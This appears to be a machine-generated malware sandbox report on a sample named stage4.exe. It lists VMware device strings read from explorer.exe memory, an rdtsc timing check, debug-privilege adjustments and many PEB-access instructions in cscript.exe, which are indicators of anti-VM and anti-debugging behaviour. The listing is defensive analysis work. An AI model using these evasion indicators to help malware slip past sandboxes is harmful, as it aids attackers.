Source: explorer.exe, 0000000F.00000000.359059122.0000000005CF6000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}[
Source: explorer.exe, 0000000F.00000003.380241749.00000000087E8000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B**
Source: explorer.exe, 0000000F.00000000.364230659.00000000085A5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 0000000F.00000003.331167484.0000000005CFA000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}are\Cla
Source: explorer.exe, 0000000F.00000003.344899906.0000000008703000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000C@v

Source: C:\Users\user\Desktop\stage4.exe

Code function: 0_2_012088C0 rdtsc

0_2_012088C0

Source: C:\Users\user\Desktop\stage4.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054F3D43 mov eax, dword ptr fs:[00000030h]	22_2_054F3D43
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05533540 mov eax, dword ptr fs:[00000030h]	22_2_05533540
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054D7D50 mov eax, dword ptr fs:[00000030h]	22_2_054D7D50
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054DC577 mov eax, dword ptr fs:[00000030h]	22_2_054DC577
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054DC577 mov eax, dword ptr fs:[00000030h]	22_2_054DC577
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_0553A537 mov eax, dword ptr fs:[00000030h]	22_2_0553A537
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05588D34 mov eax, dword ptr fs:[00000030h]	22_2_05588D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_0557E539 mov eax, dword ptr fs:[00000030h]	22_2_0557E539
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E4D3B mov eax, dword ptr fs:[00000030h]	22_2_054E4D3B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E4D3B mov eax, dword ptr fs:[00000030h]	22_2_054E4D3B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E4D3B mov eax, dword ptr fs:[00000030h]	22_2_054E4D3B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054C3D34 mov eax, dword ptr fs:[00000030h]	22_2_054C3D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054C3D34 mov eax, dword ptr fs:[00000030h]	22_2_054C3D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054C3D34 mov eax, dword ptr fs:[00000030h]	22_2_054C3D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054C3D34 mov eax, dword ptr fs:[00000030h]	22_2_054C3D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054C3D34 mov eax, dword ptr fs:[00000030h]	22_2_054C3D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054C3D34 mov eax, dword ptr fs:[00000030h]	22_2_054C3D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054C3D34 mov eax, dword ptr fs:[00000030h]	22_2_054C3D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054C3D34 mov eax, dword ptr fs:[00000030h]	22_2_054C3D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054C3D34 mov eax, dword ptr fs:[00000030h]	22_2_054C3D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054C3D34 mov eax, dword ptr fs:[00000030h]	22_2_054C3D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054C3D34 mov eax, dword ptr fs:[00000030h]	22_2_054C3D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054C3D34 mov eax, dword ptr fs:[00000030h]	22_2_054C3D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054C3D34 mov eax, dword ptr fs:[00000030h]	22_2_054C3D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054BAD30 mov eax, dword ptr fs:[00000030h]	22_2_054BAD30
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05536DC9 mov eax, dword ptr fs:[00000030h]	22_2_05536DC9
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05536DC9 mov eax, dword ptr fs:[00000030h]	22_2_05536DC9
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05536DC9 mov eax, dword ptr fs:[00000030h]	22_2_05536DC9
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05536DC9 mov ecx, dword ptr fs:[00000030h]	22_2_05536DC9
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05536DC9 mov eax, dword ptr fs:[00000030h]	22_2_05536DC9
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05536DC9 mov eax, dword ptr fs:[00000030h]	22_2_05536DC9
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05568DF1 mov eax, dword ptr fs:[00000030h]	22_2_05568DF1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054CD5E0 mov eax, dword ptr fs:[00000030h]	22_2_054CD5E0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054CD5E0 mov eax, dword ptr fs:[00000030h]	22_2_054CD5E0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_0557FDE2 mov eax, dword ptr fs:[00000030h]	22_2_0557FDE2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_0557FDE2 mov eax, dword ptr fs:[00000030h]	22_2_0557FDE2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_0557FDE2 mov eax, dword ptr fs:[00000030h]	22_2_0557FDE2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_0557FDE2 mov eax, dword ptr fs:[00000030h]	22_2_0557FDE2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054B2D8A mov eax, dword ptr fs:[00000030h]	22_2_054B2D8A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054B2D8A mov eax, dword ptr fs:[00000030h]	22_2_054B2D8A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054B2D8A mov eax, dword ptr fs:[00000030h]	22_2_054B2D8A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054B2D8A mov eax, dword ptr fs:[00000030h]	22_2_054B2D8A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054B2D8A mov eax, dword ptr fs:[00000030h]	22_2_054B2D8A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E2581 mov eax, dword ptr fs:[00000030h]	22_2_054E2581
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E2581 mov eax, dword ptr fs:[00000030h]	22_2_054E2581
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E2581 mov eax, dword ptr fs:[00000030h]	22_2_054E2581
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E2581 mov eax, dword ptr fs:[00000030h]	22_2_054E2581
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054EFD9B mov eax, dword ptr fs:[00000030h]	22_2_054EFD9B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054EFD9B mov eax, dword ptr fs:[00000030h]	22_2_054EFD9B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E35A1 mov eax, dword ptr fs:[00000030h]	22_2_054E35A1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_055805AC mov eax, dword ptr fs:[00000030h]	22_2_055805AC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_055805AC mov eax, dword ptr fs:[00000030h]	22_2_055805AC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E1DB5 mov eax, dword ptr fs:[00000030h]	22_2_054E1DB5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E1DB5 mov eax, dword ptr fs:[00000030h]	22_2_054E1DB5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E1DB5 mov eax, dword ptr fs:[00000030h]	22_2_054E1DB5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_0554C450 mov eax, dword ptr fs:[00000030h]	22_2_0554C450
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_0554C450 mov eax, dword ptr fs:[00000030h]	22_2_0554C450
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054EA44B mov eax, dword ptr fs:[00000030h]	22_2_054EA44B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054D746D mov eax, dword ptr fs:[00000030h]	22_2_054D746D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05571C06 mov eax, dword ptr fs:[00000030h]	22_2_05571C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05571C06 mov eax, dword ptr fs:[00000030h]	22_2_05571C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05571C06 mov eax, dword ptr fs:[00000030h]	22_2_05571C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05571C06 mov eax, dword ptr fs:[00000030h]	22_2_05571C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05571C06 mov eax, dword ptr fs:[00000030h]	22_2_05571C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05571C06 mov eax, dword ptr fs:[00000030h]	22_2_05571C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05571C06 mov eax, dword ptr fs:[00000030h]	22_2_05571C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05571C06 mov eax, dword ptr fs:[00000030h]	22_2_05571C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05571C06 mov eax, dword ptr fs:[00000030h]	22_2_05571C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05571C06 mov eax, dword ptr fs:[00000030h]	22_2_05571C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05571C06 mov eax, dword ptr fs:[00000030h]	22_2_05571C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05571C06 mov eax, dword ptr fs:[00000030h]	22_2_05571C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05571C06 mov eax, dword ptr fs:[00000030h]	22_2_05571C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05571C06 mov eax, dword ptr fs:[00000030h]	22_2_05571C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_0558740D mov eax, dword ptr fs:[00000030h]	22_2_0558740D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_0558740D mov eax, dword ptr fs:[00000030h]	22_2_0558740D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_0558740D mov eax, dword ptr fs:[00000030h]	22_2_0558740D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05536C0A mov eax, dword ptr fs:[00000030h]	22_2_05536C0A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05536C0A mov eax, dword ptr fs:[00000030h]	22_2_05536C0A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05536C0A mov eax, dword ptr fs:[00000030h]	22_2_05536C0A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05536C0A mov eax, dword ptr fs:[00000030h]	22_2_05536C0A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054EBC2C mov eax, dword ptr fs:[00000030h]	22_2_054EBC2C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05588CD6 mov eax, dword ptr fs:[00000030h]	22_2_05588CD6
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05536CF0 mov eax, dword ptr fs:[00000030h]	22_2_05536CF0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05536CF0 mov eax, dword ptr fs:[00000030h]	22_2_05536CF0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05536CF0 mov eax, dword ptr fs:[00000030h]	22_2_05536CF0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_055714FB mov eax, dword ptr fs:[00000030h]	22_2_055714FB
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054C849B mov eax, dword ptr fs:[00000030h]	22_2_054C849B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054CEF40 mov eax, dword ptr fs:[00000030h]	22_2_054CEF40
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054CFF60 mov eax, dword ptr fs:[00000030h]	22_2_054CFF60
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05588F6A mov eax, dword ptr fs:[00000030h]	22_2_05588F6A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054EA70E mov eax, dword ptr fs:[00000030h]	22_2_054EA70E
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054EA70E mov eax, dword ptr fs:[00000030h]	22_2_054EA70E
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_0554FF10 mov eax, dword ptr fs:[00000030h]	22_2_0554FF10
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_0554FF10 mov eax, dword ptr fs:[00000030h]	22_2_0554FF10
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_0558070D mov eax, dword ptr fs:[00000030h]	22_2_0558070D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_0558070D mov eax, dword ptr fs:[00000030h]	22_2_0558070D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054DF716 mov eax, dword ptr fs:[00000030h]	22_2_054DF716
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054B4F2E mov eax, dword ptr fs:[00000030h]	22_2_054B4F2E
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054B4F2E mov eax, dword ptr fs:[00000030h]	22_2_054B4F2E
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054EE730 mov eax, dword ptr fs:[00000030h]	22_2_054EE730
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054F37F5 mov eax, dword ptr fs:[00000030h]	22_2_054F37F5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05537794 mov eax, dword ptr fs:[00000030h]	22_2_05537794
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05537794 mov eax, dword ptr fs:[00000030h]	22_2_05537794
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05537794 mov eax, dword ptr fs:[00000030h]	22_2_05537794
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054C8794 mov eax, dword ptr fs:[00000030h]	22_2_054C8794
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054C7E41 mov eax, dword ptr fs:[00000030h]	22_2_054C7E41
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054C7E41 mov eax, dword ptr fs:[00000030h]	22_2_054C7E41
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054C7E41 mov eax, dword ptr fs:[00000030h]	22_2_054C7E41
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054C7E41 mov eax, dword ptr fs:[00000030h]	22_2_054C7E41
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054C7E41 mov eax, dword ptr fs:[00000030h]	22_2_054C7E41
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054C7E41 mov eax, dword ptr fs:[00000030h]	22_2_054C7E41
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_0557AE44 mov eax, dword ptr fs:[00000030h]	22_2_0557AE44
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_0557AE44 mov eax, dword ptr fs:[00000030h]	22_2_0557AE44
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054C766D mov eax, dword ptr fs:[00000030h]	22_2_054C766D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054DAE73 mov eax, dword ptr fs:[00000030h]	22_2_054DAE73
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054DAE73 mov eax, dword ptr fs:[00000030h]	22_2_054DAE73
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054DAE73 mov eax, dword ptr fs:[00000030h]	22_2_054DAE73
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054DAE73 mov eax, dword ptr fs:[00000030h]	22_2_054DAE73
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054DAE73 mov eax, dword ptr fs:[00000030h]	22_2_054DAE73
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054BC600 mov eax, dword ptr fs:[00000030h]	22_2_054BC600
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054BC600 mov eax, dword ptr fs:[00000030h]	22_2_054BC600
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054BC600 mov eax, dword ptr fs:[00000030h]	22_2_054BC600
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E8E00 mov eax, dword ptr fs:[00000030h]	22_2_054E8E00
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054EA61C mov eax, dword ptr fs:[00000030h]	22_2_054EA61C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054EA61C mov eax, dword ptr fs:[00000030h]	22_2_054EA61C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05571608 mov eax, dword ptr fs:[00000030h]	22_2_05571608
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_0556FE3F mov eax, dword ptr fs:[00000030h]	22_2_0556FE3F
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054BE620 mov eax, dword ptr fs:[00000030h]	22_2_054BE620
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E36CC mov eax, dword ptr fs:[00000030h]	22_2_054E36CC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054F8EC7 mov eax, dword ptr fs:[00000030h]	22_2_054F8EC7
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05588ED6 mov eax, dword ptr fs:[00000030h]	22_2_05588ED6
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_0556FEC0 mov eax, dword ptr fs:[00000030h]	22_2_0556FEC0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E16E0 mov ecx, dword ptr fs:[00000030h]	22_2_054E16E0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054C76E2 mov eax, dword ptr fs:[00000030h]	22_2_054C76E2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_0554FE87 mov eax, dword ptr fs:[00000030h]	22_2_0554FE87
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_055346A7 mov eax, dword ptr fs:[00000030h]	22_2_055346A7
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05580EA5 mov eax, dword ptr fs:[00000030h]	22_2_05580EA5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05580EA5 mov eax, dword ptr fs:[00000030h]	22_2_05580EA5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05580EA5 mov eax, dword ptr fs:[00000030h]	22_2_05580EA5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054DB944 mov eax, dword ptr fs:[00000030h]	22_2_054DB944
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054DB944 mov eax, dword ptr fs:[00000030h]	22_2_054DB944
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054BC962 mov eax, dword ptr fs:[00000030h]	22_2_054BC962
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054BB171 mov eax, dword ptr fs:[00000030h]	22_2_054BB171
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054BB171 mov eax, dword ptr fs:[00000030h]	22_2_054BB171
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054B9100 mov eax, dword ptr fs:[00000030h]	22_2_054B9100
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054B9100 mov eax, dword ptr fs:[00000030h]	22_2_054B9100
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054B9100 mov eax, dword ptr fs:[00000030h]	22_2_054B9100
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054D4120 mov eax, dword ptr fs:[00000030h]	22_2_054D4120
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054D4120 mov eax, dword ptr fs:[00000030h]	22_2_054D4120
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054D4120 mov eax, dword ptr fs:[00000030h]	22_2_054D4120
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054D4120 mov eax, dword ptr fs:[00000030h]	22_2_054D4120
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054D4120 mov ecx, dword ptr fs:[00000030h]	22_2_054D4120
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E513A mov eax, dword ptr fs:[00000030h]	22_2_054E513A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E513A mov eax, dword ptr fs:[00000030h]	22_2_054E513A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054BB1E1 mov eax, dword ptr fs:[00000030h]	22_2_054BB1E1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054BB1E1 mov eax, dword ptr fs:[00000030h]	22_2_054BB1E1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054BB1E1 mov eax, dword ptr fs:[00000030h]	22_2_054BB1E1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_055441E8 mov eax, dword ptr fs:[00000030h]	22_2_055441E8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054EA185 mov eax, dword ptr fs:[00000030h]	22_2_054EA185
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054DC182 mov eax, dword ptr fs:[00000030h]	22_2_054DC182
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E2990 mov eax, dword ptr fs:[00000030h]	22_2_054E2990
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_055351BE mov eax, dword ptr fs:[00000030h]	22_2_055351BE
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_055351BE mov eax, dword ptr fs:[00000030h]	22_2_055351BE
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_055351BE mov eax, dword ptr fs:[00000030h]	22_2_055351BE
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_055351BE mov eax, dword ptr fs:[00000030h]	22_2_055351BE
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E61A0 mov eax, dword ptr fs:[00000030h]	22_2_054E61A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E61A0 mov eax, dword ptr fs:[00000030h]	22_2_054E61A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_055369A6 mov eax, dword ptr fs:[00000030h]	22_2_055369A6
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054D0050 mov eax, dword ptr fs:[00000030h]	22_2_054D0050
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054D0050 mov eax, dword ptr fs:[00000030h]	22_2_054D0050
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05572073 mov eax, dword ptr fs:[00000030h]	22_2_05572073
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05581074 mov eax, dword ptr fs:[00000030h]	22_2_05581074
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05537016 mov eax, dword ptr fs:[00000030h]	22_2_05537016
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05537016 mov eax, dword ptr fs:[00000030h]	22_2_05537016
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05537016 mov eax, dword ptr fs:[00000030h]	22_2_05537016
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05584015 mov eax, dword ptr fs:[00000030h]	22_2_05584015
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05584015 mov eax, dword ptr fs:[00000030h]	22_2_05584015
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E002D mov eax, dword ptr fs:[00000030h]	22_2_054E002D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E002D mov eax, dword ptr fs:[00000030h]	22_2_054E002D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E002D mov eax, dword ptr fs:[00000030h]	22_2_054E002D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E002D mov eax, dword ptr fs:[00000030h]	22_2_054E002D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E002D mov eax, dword ptr fs:[00000030h]	22_2_054E002D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054CB02A mov eax, dword ptr fs:[00000030h]	22_2_054CB02A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054CB02A mov eax, dword ptr fs:[00000030h]	22_2_054CB02A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054CB02A mov eax, dword ptr fs:[00000030h]	22_2_054CB02A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054CB02A mov eax, dword ptr fs:[00000030h]	22_2_054CB02A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_0554B8D0 mov eax, dword ptr fs:[00000030h]	22_2_0554B8D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_0554B8D0 mov ecx, dword ptr fs:[00000030h]	22_2_0554B8D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_0554B8D0 mov eax, dword ptr fs:[00000030h]	22_2_0554B8D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_0554B8D0 mov eax, dword ptr fs:[00000030h]	22_2_0554B8D0
